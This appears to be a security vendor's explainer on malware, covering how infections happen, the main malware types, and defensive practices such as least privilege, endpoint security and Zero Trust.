Malware, short for 'malicious software,' refers to any computer software (including firmware, microcode, etc.) created with the purpose of causing harm, such as stealing data or disrupting computers, systems, and other equipment.
Malware is often created by threat actors to:
While malware created years ago can remain dangerous if proper cybersecurity controls are not in place, newer malware types are increasing in sophistication, and even incorporating AI.
You can get malware through various means, primarily through downloading and opening infected files or software from untrustworthy sources. Malware often disguises itself as legitimate applications or files, such as attachments in emails or downloads from malicious websites. Clicking on suspicious links or advertisements can also lead to malware infections, as these links may redirect you to compromised websites
The most common way to get malware is through phishing emails. Threat actors have become incredibly effective and adept at crafting emails that trick people into clicking on links or downloading files that contain malicious code.
Another frequent way to get malware is through exploiting software vulnerabilities. Outdated software and operating systems may have known weaknesses hackers and threat actors can exploit to deliver malware to your system. Therefore, it's crucial to keep your software up to date to minimize risk and shrink the potential attack surface.
Finally, removable media like USB drives can carry malware. When you connect an infected USB drive to your computer, the malware may automatically execute and infect your system. It’s important to always exercise caution with the files, software, and devices you allow into a trusted environment.
Malware can wreak havoc on computer systems, causing a range of disruptive symptoms. These signs serve as warning signals that your computer may be infected. Being aware of these common malware symptoms is crucial for early detection and prompt action to safeguard your systems and data.
There are ten main types of malware, which we expand on below.
Worms run independently and spreads by leveraging bugs, vulnerabilities, and exploits to deliver a payload and duplicate themselves across other resources. They often hide in attachments or downloads, scanning networks for other susceptible systems. Worms may consume vast amounts of bandwidth or operate stealthily. Depending on their intent, worms could shut down networks or disable web servers. Earlier types of self-propagating ransomware (WannaCry, Camaro Dragon etc.) that infected multiple systems were a form of a worm.
A virus is any type of self-replicating malware. The intent of the virus may not be apparent from an initial infection. Viruses tend to lie dormant on a resource until triggered to perform a malicious action, such as spreading to another resource.
Bots are created to perform specific tasks with known, malicious intent. A botnet is a collection of bots that can be commanded by a bot herder in coordinated attacks. Botnets can launch attacks at massive scale, such as for spamming or launching Distributed Denial of Service (DDoS) attacks, disrupting websites, networks, or Internet-based services.
A trojan is a type of malware, like the mythical Trojan Horse, uses disguise. A trojan malware disguises itself as a normal file or application and tricks the user into downloading, opening, or executing it. The payload can launch any other form of malware and continue to deceive users into thinking they are interacting with a legitimate piece of software. Authentication-based attacks are typically based on Trojans.
Ransomware denies access to your files, typically through encryption, and demands a ransom (often in the form of digital cryptocurrencies like Bitcoin) to release the threat actor’s grip on your data. If the ransom is paid, and the threat actor is operating a real ransomware service, they will provide a method to decrypt your files and allow you to gain access to the assets again. In some cases, payment is made, but the threat actor has long abandoned their scheme, leaving the victim with infected systems and a financial loss that cannot be recovered.
Adware is designed to display unwanted, and potentially illegal, advertisements to an end user. Clicking the ads often leads to further adware or other malware downloads, malicious website redirects, or launching an exploit. The goal of adware is to expose services to the end user and trick them into performing additional steps to load more malware or surveillance-based software.
Spyware functions by spying on a user’s activity. These functions can include monitoring the user’s screen, capturing keystrokes, and even enabling the asset’s camera and microphone for surveillance. This information is collected and transmitted through the Internet or stored locally for later retrieval by the threat actor. Threat actors may use the information to hijack accounts or conduct privileged escalation attacks.
Rootkits are a type of malware providing privileged, root-level (i.e., administrative) access to a computer, network, or application, while concealing their presence on that machine. Once activated, the malicious program sets up a backdoor exploit and may deliver additional malware, such as ransomware, bots, keyloggers or trojans to deepen its reach or execute lateral movement within a system.
Fileless malware is an advanced type of malicious software operating entirely in a computer's memory, leaving behind no traces on the hard drive. By exploiting vulnerabilities and leveraging legitimate processes, it evades detection, making it challenging to identify and eliminate. Typically, fileless attacks take advantage of scripting languages, PowerShell, or other system utilities to avoid detection. Threat actors employ living-off-the-land (LotL) apps, legitimate applications allowed on a system, to bypass both allow and deny listing and carry out typically restricted actions maliciously. Advanced persistent threats (APTs) frequently make use of fileless malware to remain undetected, while stealthily advancing an attack.
While bugs may not be created with malicious intent as the other types of ‘malware’ on this list, they can cause just as much damage. Bugs are a type of software error, flaw, vulnerability, or failure that arises due to poor coding or unexpected operational conditions. Bugs can exist in any type of software, including within local applications and websites. When bugs can be leveraged against an application and its data, they are called vulnerabilities, and the software used to leverage them are called exploits.
To effectively prevent malware, businesses must recognize that relying solely on traditional antivirus technology is wholly insufficient. Protecting against the broad different types of malware threats requires a blend of proactive and reactive security strategies that incorporate multiple layers of security controls. Employing a defense-in-depth methodology ensures that, even if an attacker bypasses one security barrier, such as the perimeter firewall, there are additional measures in place to block or contain a breach.
In any area of security, there is no single silver bullet technology that will protect and secure a system. That being said, here are key security disciplines and principles to effectively mitigate malware threats.
Identity Security focuses on safeguarding digital identities and access controls to ensure that only authorized individuals can access sensitive systems and data. Identity security measures include user access management, password policies, multi-faction authentication (MFA) and identity and access management (IAM) systems to centralize and control user permissions.
Endpoint security entails securing devices, such as mobile devices, laptops, and desktop PCs, and ensuring that those devices comply with certain criteria before they are granted access to network resources. It involves deploying a combination of hardware and software measures to secure these endpoints and prevent unauthorized access, malware infections, data leaks, and other attacks. The goal of endpoint security is to limit the attack surface and safeguard the network from malicious threats (like malware). Important types of endpoint security include antivirus/antimalware, endpoint detection and response (EDR), and endpoint privilege management.
One of the fundamental security principles is to grant each user the minimum access required for their job, known as “least privilege access.” A big challenge of implementing least privilege is managing access over time. Just because someone needs access today doesn't mean they'll need it in the future. Removing access when it's no longer necessary is paramount for maintaining an appropriate level of least privilege. By implementing PoLP, such as via a privileged access management (PAM) solution, organizations can decrease the risk of unauthorized access, mitigate the potential harm from insider threats or compromised accounts, and reduce the attack surface available to malicious actors.
Application Control can technically be considered a type of endpoint security, but its importance in mitigating malware merits a separate call-out. Threat actors usually focus on exploiting applications to gain prolonged access to a system. They achieve this by injecting or attaching malicious code (like malware) to key applications. Email and web-based applications are the most common targets in this manner. To enhance system security and make it significantly more challenging for adversaries to cause harm, security teams can effectively control and manage applications. By incorporating context (such as around child processes) that prevents exploitation of commonly used and legitimate applications, Trusted Application Protection (TAP) provides specialized security that can help dismantle fileless attacks.
For devices directly accessible from the Internet while traveling, or companies that have bring your own device (BYOD) policies, authentication often serves as the primary and sole defense. Despite having various security software installed on the system, if a threat actor manages to obtain your password or enterprise credentials, they will gain access to the system. While the least privilege principle can help reduce potential damage, effective control and management of authentication credentials remain essential for keeping adversaries out of the system.
Zero Trust is a security framework that operates under the assumption of no inherent trust in any user or device, whether they are inside or outside the organization's network perimeter. Unlike the traditional approach of granting excessive trust after initial access, Zero Trust follows a "never trust, always verify" mentality. This means continuous authentication, authorization, and monitoring of all network traffic, user activities, and devices are required. Such an approach enables organizations to detect and mitigate potential security threats, even if they originate from within the network. The principle of least privilege is a central piece of a Zero Trust framework.
You may be familiar with the security mantra, prevention is ideal, but detection is a must. We must acknowledge that systems can be compromised, making timely detection crucial for identifying and halting exploits. To achieve this, deploying advanced hunting mechanisms with behavioral and threat intelligence can help swiftly identify and dismantle in-progress attacks.
As Malware and other cyber threats continue to evolve and become more sophisticated, such as by incorporating AI-based capabilities, organizations and individuals must adopt robust measures to protect their systems, data, and privacy.
This includes implementing an integrated, defense-in-depth approach to endpoints, various security controls and practicing good cyber hygiene to mitigate risks and safeguard against potential breaches.